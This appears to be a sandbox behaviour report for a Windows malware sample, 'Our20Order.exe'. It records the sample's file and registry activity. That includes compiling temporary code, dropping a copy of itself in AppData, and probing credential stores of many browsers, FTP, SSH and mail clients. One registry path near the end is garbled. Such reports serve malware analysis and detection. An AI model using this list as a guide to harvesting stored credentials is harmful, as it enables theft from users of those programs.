C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.config C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp C:\Windows\System32\tzres.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Write Files
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
Delete Files
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Our20Order.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\Our20Order.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\2DC8850A HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software HKEY_CURRENT_USER\Software\Adobe HKEY_CURRENT_USER\Software\AppDataLow HKEY_CURRENT_USER\Software\JavaSoft HKEY_CURRENT_USER\Software\Macromedia HKEY_CURRENT_USER\Software\Microsoft HKEY_CURRENT_USER\Software\Netscape HKEY_CURRENT_USER\Software\ODBC HKEY_CURRENT_USER\Software\Policies HKEY_CURRENT_USER\Software\Wow6432Node HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Bitvise\BvSshClient HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x88\xef\xbf\xbd\xef\xbf\xbd\xd1\x96\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\xaf\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch 